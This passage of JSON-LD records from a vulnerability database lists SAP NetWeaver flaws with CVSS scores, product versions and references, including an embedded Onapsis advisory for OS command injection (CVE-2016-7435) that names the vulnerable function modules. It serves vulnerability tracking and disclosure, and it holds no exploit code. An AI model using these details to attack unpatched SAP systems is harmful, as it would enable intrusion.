"id": "CNVD-2011-2387"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver \u0027Deployer servlet\u0027 Input Cross-Site Scripting Vulnerability",
"sources": [
{
"db": "IVD",
"id": "c05b8e4e-1f91-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2011-2387"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross-site scripting",
"sources": [
{
"db": "IVD",
"id": "c05b8e4e-1f91-11e6-abef-000c29c66e3d"
}
],
"trust": 0.2
}
}
var-201611-0433
Vulnerability from variot
SAP NetWeaver is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may lead to further attacks. SAP Netweaver 7.5 is vulnerable.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201611-0433",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.5"
}
],
"sources": [
{
"db": "BID",
"id": "94174"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Mathieu Geli (ERPScan)",
"sources": [
{
"db": "BID",
"id": "94174"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is prone to an information-disclosure vulnerability.\nAttackers can exploit this issue to obtain sensitive information that may lead to further attacks.\nSAP Netweaver 7.5 is vulnerable.",
"sources": [
{
"db": "BID",
"id": "94174"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "94174",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "94174"
}
]
},
"id": "VAR-201611-0433",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T01:41:08.864000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com"
},
{
"trust": 0.3,
"url": "www.sap.com/platform/netweaver"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/2342940"
},
{
"trust": 0.3,
"url": "https://erpscan.com/advisories/erpscan-16-039-sap-netweaver-7-5-information-disclosure-port-scan-sld-test-application/"
}
],
"sources": [
{
"db": "BID",
"id": "94174"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "94174"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-11-08T00:00:00",
"db": "BID",
"id": "94174"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2016-11-24T01:08:00",
"db": "BID",
"id": "94174"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "94174"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Java AS \u0027Webdynpro\u0027 Component Information Disclosure Vulnerability",
"sources": [
{
"db": "BID",
"id": "94174"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "94174"
}
],
"trust": 0.3
}
}
var-201707-1367
Vulnerability from variot
SAP NetWeaver is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201707-1367",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "99527"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported the issue.",
"sources": [
{
"db": "BID",
"id": "99527"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is prone to an information-disclosure vulnerability.\nAttackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.",
"sources": [
{
"db": "BID",
"id": "99527"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "99527",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "99527"
}
]
},
"id": "VAR-201707-1367",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T02:07:05.784000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com/"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/07/11/sap-security-patch-day-july-2017/"
},
{
"trust": 0.3,
"url": "https://launchpad.support.sap.com/#/notes/2424742"
}
],
"sources": [
{
"db": "BID",
"id": "99527"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "99527"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-11T00:00:00",
"db": "BID",
"id": "99527"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-07-11T00:00:00",
"db": "BID",
"id": "99527"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "99527"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Master Data Management Information Disclosure Vulnerability",
"sources": [
{
"db": "BID",
"id": "99527"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "99527"
}
],
"trust": 0.3
}
}
var-201610-0351
Vulnerability from variot
The (1) SCTC_REFRESH_EXPORT_TAB_COMP, (2) SCTC_REFRESH_CHECK_ENV, and (3) SCTC_TMS_MAINTAIN_ALOG functions in the SCTC subpackage in SAP Netweaver 7.40 SP 12 allow remote authenticated users with certain permissions to execute arbitrary commands via vectors involving a CALL 'SYSTEM' statement, aka SAP Security Note 2260344. SAP Netweaver is prone to multiple OS command-injection vulnerabilities because it fails to properly sanitize user-supplied input. Attackers can exploit these issues to execute arbitrary OS commands in context of the affected application. Onapsis Security Advisory ONAPSIS-2016-044: SAP OS Command Injection in PREPARE_CHECK_CAPACITY
1. Impact on Business
By exploiting this vulnerability an authenticated user will be able to take full control of the system.
Risk Level: Critical
2. Advisory Information
- Public Release Date: 09/22/2016
- Last Revised: 09/22/2016
- Security Advisory ID: ONAPSIS-2016-044
- Onapsis SVS ID: ONAPSIS-00250
- CVE: CVE-2016-7435
- Researcher: Pablo Artuso
- Vendor Provided CVSS v3: 9.0 (AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:H/A:H)
- Onapsis CVSS v3: 9.1 (AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)
3. Vulnerability Information
- Vendor: SAP AG
- Affected Components: SAP Netweaver 7.40 SP 12
- Vulnerability Class: Improper Neutralization of Special Elements used in an OS Command (CWE-78)
- Remotely Exploitable: Yes
- Locally Exploitable: No
- Authentication Required: Yes
- Original Advisory: https://www.onapsis.com/research/security-advisories/sap-os-command-injection-preparecheckcapacity
4. Affected Components Description
SAP NetWeaver is the SAP technological integration platform, on top of which, enterprise and business solutions are developed and run. In particular, SCTC is a subpackage of SAP_BASIS which holds technical configurations.
6. Solution
Implement SAP Security Note 2260344.
7. Report Timeline
- 11/26/2015: Onapsis provides vulnerability information to SAP AG.
- 11/27/2015: SAP AG confirms reception of vulnerability report.
- 01/12/2016: SAP reports fix is In Process.
- 03/08/2016: SAP releases SAP Security Note 2260344 fixing the vulnerability.
- 09/22/2016: Onapsis Releases Security Advisory.
About Onapsis Research Labs
Onapsis Research Labs provides the industry analysis of key security issues that impact business-critical systems and applications. Delivering frequent and timely security and compliance advisories with associated risk levels, Onapsis Research Labs combine in-depth knowledge and experience to deliver technical and business-context with sound security judgment to the broader information security community.
About Onapsis, Inc.
Onapsis provides the most comprehensive solutions for securing SAP and Oracle enterprise applications. As the leading experts in SAP and Oracle cyber-security, Onapsis enables security and audit teams to have visibility, confidence and control of advanced threats, cyber-risks and compliance gaps affecting their enterprise applications.
Headquartered in Boston, Onapsis serves over 180 Global 2000 customers, including 10 top retailers, 20 top energy firms and 20 top manufacturers. Onapsis solutions are also the de-facto standard for leading consulting and audit firms such as Accenture, IBM, Deloitte, E&Y, KPMG and PwC.
Onapsis solutions include the Onapsis Security Platform, which is the most widely-used SAP-certified cyber-security solution in the market. Unlike generic security products, Onapsis context-aware solutions deliver both preventative vulnerability and compliance controls, as well as real-time detection and incident response capabilities to reduce risks affecting critical business processes and data. Through open interfaces, the platform can be integrated with leading SIEM, GRC and network security products, seamlessly incorporating enterprise applications into existing vulnerability, risk and incident response management programs.
These solutions are powered by the Onapsis Research Labs which continuously provide leading intelligence on security threats affecting SAP and Oracle enterprise applications. Experts of the Onapsis Research Labs were the first to lecture on SAP cyber-attacks and have uncovered and helped fix hundreds of security vulnerabilities to-date affecting SAP Business Suite, SAP HANA, SAP Cloud and SAP Mobile applications, as well as Oracle JD Edwards and Oracle E-Business Suite platforms.
For more information, please visit www.onapsis.com, or connect with us on Twitter, Google+, or LinkedIn.
-- This email and any files transmitted with it are confidential and intended solely for the use of the individual or entity to whom they are addressed. If you have received this email in error please notify the system manager. This message contains confidential information and is intended only for the individual named. If you are not the named addressee you should not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this e-mail by mistake and delete this e-mail from your system. If you are not the intended recipient you are notified that disclosing, copying, distributing or taking any action in reliance on the contents of this information is strictly prohibited
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201610-0351",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.40 sp 12"
},
{
"model": "netweaver sp12",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.40"
}
],
"sources": [
{
"db": "BID",
"id": "93272"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005170"
},
{
"db": "NVD",
"id": "CVE-2016-7435"
},
{
"db": "CNNVD",
"id": "CNNVD-201610-113"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.40:sp12:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2016-7435"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Pablo Artuso",
"sources": [
{
"db": "PACKETSTORM",
"id": "139095"
},
{
"db": "PACKETSTORM",
"id": "139088"
},
{
"db": "PACKETSTORM",
"id": "139085"
},
{
"db": "PACKETSTORM",
"id": "139083"
},
{
"db": "PACKETSTORM",
"id": "139092"
},
{
"db": "PACKETSTORM",
"id": "139084"
}
],
"trust": 0.6
},
"cve": "CVE-2016-7435",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2016-7435",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.3,
"impactScore": 6.0,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.1,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2016-7435",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "High",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2016-7435",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-201610-113",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-005170"
},
{
"db": "NVD",
"id": "CVE-2016-7435"
},
{
"db": "CNNVD",
"id": "CNNVD-201610-113"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The (1) SCTC_REFRESH_EXPORT_TAB_COMP, (2) SCTC_REFRESH_CHECK_ENV, and (3) SCTC_TMS_MAINTAIN_ALOG functions in the SCTC subpackage in SAP Netweaver 7.40 SP 12 allow remote authenticated users with certain permissions to execute arbitrary commands via vectors involving a CALL \u0027SYSTEM\u0027 statement, aka SAP Security Note 2260344. SAP Netweaver is prone to multiple OS command-injection vulnerabilities because it fails to properly sanitize user-supplied input. \nAttackers can exploit these issues to execute arbitrary OS commands in context of the affected application. Onapsis Security Advisory ONAPSIS-2016-044: SAP OS Command Injection in PREPARE_CHECK_CAPACITY\n\n1. Impact on Business\n=====================\nBy exploiting this vulnerability an authenticated user will be able to take full control of the system. \n\nRisk Level: Critical\n\n2. Advisory Information\n=======================\n- Public Release Date: 09/22/2016\n- Last Revised: 09/22/2016\n- Security Advisory ID: ONAPSIS-2016-044\n- Onapsis SVS ID: ONAPSIS-00250\n- CVE: CVE-2016-7435\n- Researcher: Pablo Artuso\n- Vendor Provided CVSS v3: 9.0 (AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:H/A:H)\n- Onapsis CVSS v3: 9.1 (AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)\n\n3. Vulnerability Information\n============================\n- Vendor: SAP AG\n- Affected Components: SAP Netweaver 7.40 SP 12\n- Vulnerability Class: Improper Neutralization of Special Elements used in an OS Command (CWE-78)\n- Remotely Exploitable: Yes\n- Locally Exploitable: No\n- Authentication Required: Yes \n- Original Advisory: https://www.onapsis.com/research/security-advisories/sap-os-command-injection-preparecheckcapacity\n\n4. Affected Components Description\n==================================\nSAP NetWeaver is the SAP technological integration platform, on top of which, enterprise and business solutions are developed and run. \nIn particular, SCTC is a subpackage of SAP_BASIS which holds technical configurations. \n\n\n5. \n\n6. Solution\n===========\nImplement SAP Security Note 2260344. \n\n7. Report Timeline\n==================\n- 11/26/2015: Onapsis provides vulnerability information to SAP AG. \n- 11/27/2015: SAP AG confirms reception of vulnerability report. \n- 01/12/2016: SAP reports fix is In Process. \n- 03/08/2016: SAP releases SAP Security Note 2260344 fixing the vulnerability. \n- 09/22/2016: Onapsis Releases Security Advisory. \n\n\n\nAbout Onapsis Research Labs\n===========================\nOnapsis Research Labs provides the industry analysis of key security issues that impact business-critical systems and applications. Delivering frequent and timely security and compliance advisories with associated risk levels, Onapsis Research Labs combine in-depth knowledge and experience to deliver technical and business-context with sound security judgment to the broader information security community. \n\nAbout Onapsis, Inc. \n===================\nOnapsis provides the most comprehensive solutions for securing SAP and Oracle enterprise applications. As the leading experts in SAP and Oracle cyber-security, Onapsis enables security and audit teams to have visibility, confidence and control of advanced threats, cyber-risks and compliance gaps affecting their enterprise applications. \n\nHeadquartered in Boston, Onapsis serves over 180 Global 2000 customers, including 10 top retailers, 20 top energy firms and 20 top manufacturers. Onapsis solutions are also the de-facto standard for leading consulting and audit firms such as Accenture, IBM, Deloitte, E\u0026Y, KPMG and PwC. \n\nOnapsis solutions include the Onapsis Security Platform, which is the most widely-used SAP-certified cyber-security solution in the market. Unlike generic security products, Onapsis context-aware solutions deliver both preventative vulnerability and compliance controls, as well as real-time detection and incident response capabilities to reduce risks affecting critical business processes and data. Through open interfaces, the platform can be integrated with leading SIEM, GRC and network security products, seamlessly incorporating enterprise applications into existing vulnerability, risk and incident response management programs. \n\nThese solutions are powered by the Onapsis Research Labs which continuously provide leading intelligence on security threats affecting SAP and Oracle enterprise applications. Experts of the Onapsis Research Labs were the first to lecture on SAP cyber-attacks and have uncovered and helped fix hundreds of security vulnerabilities to-date affecting SAP Business Suite, SAP HANA, SAP Cloud and SAP Mobile applications, as well as Oracle JD Edwards and Oracle E-Business Suite platforms. \n\nFor more information, please visit www.onapsis.com, or connect with us on Twitter, Google+, or LinkedIn. \n\n\n\n-- \nThis email and any files transmitted with it are confidential and intended \nsolely for the use of the individual or entity to whom they are addressed. \nIf you have received this email in error please notify the system manager. \nThis message contains confidential information and is intended only for the \nindividual named. If you are not the named addressee you should not \ndisseminate, distribute or copy this e-mail. \nPlease notify the sender immediately by e-mail if you have received this \ne-mail by mistake and delete this e-mail from your system. If you are not \nthe intended recipient you are notified that disclosing, copying, \ndistributing or taking any action in reliance on the contents of this \ninformation is strictly prohibited",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-7435"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005170"
},
{
"db": "BID",
"id": "93272"
},
{
"db": "PACKETSTORM",
"id": "139095"
},
{
"db": "PACKETSTORM",
"id": "139088"
},
{
"db": "PACKETSTORM",
"id": "139085"
},
{
"db": "PACKETSTORM",
"id": "139083"
},
{
"db": "PACKETSTORM",
"id": "139092"
},
{
"db": "PACKETSTORM",
"id": "139084"
}
],
"trust": 2.43
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-7435",
"trust": 3.3
},
{
"db": "BID",
"id": "93272",
"trust": 1.3
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005170",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "138950",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "138952",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "138951",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201610-113",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "139095",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "139088",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "139085",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "139083",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "139092",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "139084",
"trust": 0.1
}
],
"sources": [
{
"db": "BID",
"id": "93272"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-005170"
},
{
"db": "PACKETSTORM",
"id": "139095"
},
{
"db": "PACKETSTORM",
"id": "139088"
},
{
"db": "PACKETSTORM",
"id": "139085"
},
{
"db": "PACKETSTORM",
"id": "139083"
},
{
"db": "PACKETSTORM",
"id": "139092"
},
{
"db": "PACKETSTORM",
"id": "139084"
},
{
"db": "NVD",
"id": "CVE-2016-7435"
},
{
"db": "CNNVD",
"id": "CNNVD-201610-113"
}
]
},
"id": "VAR-201610-0351",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
